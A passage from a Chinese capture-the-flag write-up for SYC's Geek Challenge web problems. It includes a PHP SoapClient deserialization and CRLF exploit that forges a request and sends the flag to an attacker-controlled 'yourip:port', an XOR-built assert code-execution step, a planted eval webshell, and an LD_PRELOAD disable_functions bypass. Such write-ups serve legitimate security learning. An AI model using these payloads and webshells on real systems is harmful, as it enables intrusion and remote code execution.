那接下来就开始构造exp,如果有哪里没看懂的朋友可以先去了解一下SoapClient类和CRLF

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
$target = 'http://127.0.0.1/unserbucket/aaaaaaaaaaafxadwagaefae/UcantGuess.php';
$post_string = 'message=iwantflag&url=http://yourip:port';
$headers = array(
'X-Forwarded-For: 127.0.0.1'
);
$b=array('location' => $target,'user_agent'=>'wupco^^Content-Type: application/x-www-form-urlencoded^^'.join('^^',$headers).'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri' => "aaab");
$aaa = serialize($b);
$aaa = str_replace('^^',"\r\n",$aaa);
$c=unserialize($aaa);
class fxxk{
public $par0 = 'SoapClient';
public $par1 = null;
public $par2;
public $par3 = 'unser';
public $kelasi;
}
$a=new fxxk();
$a->par2=$c;
echo urlencode(serialize($a));
?>

跑出来直接去打就行,记得监听端口哦

image.png

image.png

成功弹回flag,拿下

#22.easyGO

题目地址:http://1.14.102.22:8001/

image.png

看了这题目描述我就知道我不会了哈哈哈

23.breakout

题目地址:http://1.14.102.22:8013/

一道异或构造assert,加上绕过disable_functions的题

首先源码如下:

1
2
3
4
5
6
7
8
<?php
highlight_file(__FILE__);
// 这些奇怪的符号是什么呢?字符串之间还能异或的吗?
$a = $_POST['v'] ^ '!-__)^';
// ctf常见的验证码哦!纯数字呢
if (substr(md5($_POST['auth']),0,6) == "666666") {
$a($_POST['code']);
}

可以看到他给出的是六个字符,那我们也得想办法给出六个字符,然后异或一下异或出一个函数名assert,具体异或的原理及过程可以去看我的另一篇文章无数字字母RCE,那里面讲的很清楚,那这里就直接给出异或的结果了:@^,:[*,然后下面写个脚本爆破就完了,得到爆破出来的结果:3185471

image.png

然后就可以执行php代码了,先来个phpinfo看看

image.png

发现它既有disable_funtions也有openbase_dir,只能访问/var/www/html/tmp,而且经过检验只有/tmp目录有写入权限,那我们就尝试往里面写马试试,然后包含它就可以连接蚁剑了,file_put_contents('/tmp/ma.php','<?php eval($_POST[1]);');

image.png

image.png

这样就可以了,直接去连接蚁剑,记得加上body中的内容,像下图这样就可以了:

image.png

进去之后直接到达/tmp目录下,利用绕disable_functions的常规方法就行了,把php文件和so文件上传上去到/tmp目录下,https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD,这里有个很恶心的地方就是mailban掉了,得把php里面的mail改成mb_send_mail,然后就可以了

image.png

找到readflag函数,直接执行它就完事儿

image.png

#24.validation

题目地址:http://110.42.233.91:88/

image.png

这道题其实或许可以试试的,但后面太忙了就没做了

总的来说这次极客大挑战题目质量都非常高,能从中学到很多有意思的东西,在此感谢SYC的师傅们的精心命题